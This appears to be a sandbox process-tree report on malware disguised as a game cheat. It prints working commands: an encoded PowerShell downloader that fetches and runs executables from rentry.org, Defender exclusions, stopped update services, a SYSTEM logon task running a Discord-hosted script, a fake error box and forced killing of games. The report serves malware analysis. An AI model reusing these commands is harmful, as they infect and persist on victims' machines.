C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx1.exe"C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx2.exe"C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx3.exe"C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx3.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21FA.tmp\21FB.tmp\21FC.bat C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx3.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\Downloads\ZWHAX\ZWHAX\ZWHax.exe"C:\Users\Admin\Downloads\ZWHAX\ZWHAX\ZWHax.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf0.exe"C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5520.tmp\5521.tmp\5522.bat C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf0.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "dota2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "cs2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RustClient.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "GTA5.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "TslGame.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "steam.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
